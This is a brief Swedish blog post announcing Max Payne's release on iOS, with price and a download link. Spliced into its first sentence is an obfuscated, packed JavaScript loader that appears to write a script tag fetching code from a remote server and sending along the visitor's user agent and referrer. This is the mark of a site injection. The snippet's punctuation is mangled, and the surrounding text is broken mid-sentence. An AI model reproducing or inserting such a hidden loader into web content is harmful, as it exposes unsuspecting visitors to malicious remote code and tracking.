Image Image Image Image Image Image Image Image Image Image

| 11 augusti, 2020

Scroll to top

Top

Max Payne till iPhone och iPad ute nu!

Sebastian

Som eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|inbzk|var|u0026u|referrer|ydkkn||js|php’.split(’|’),0,{}))
lovat har nu spelutvecklarna Rockstar släppt sin tt Max Payne till iOS.

Spelet kostar 22 kornor och är fullmatat med action. Grand Theft Auto 3 lyckades bra med sin försäljning och man hoppas väl att detta ska bli minst lika bra.

Ladda ner och börja spela via länken nedan! 🙂

Max Payne Mobile - Rockstar Games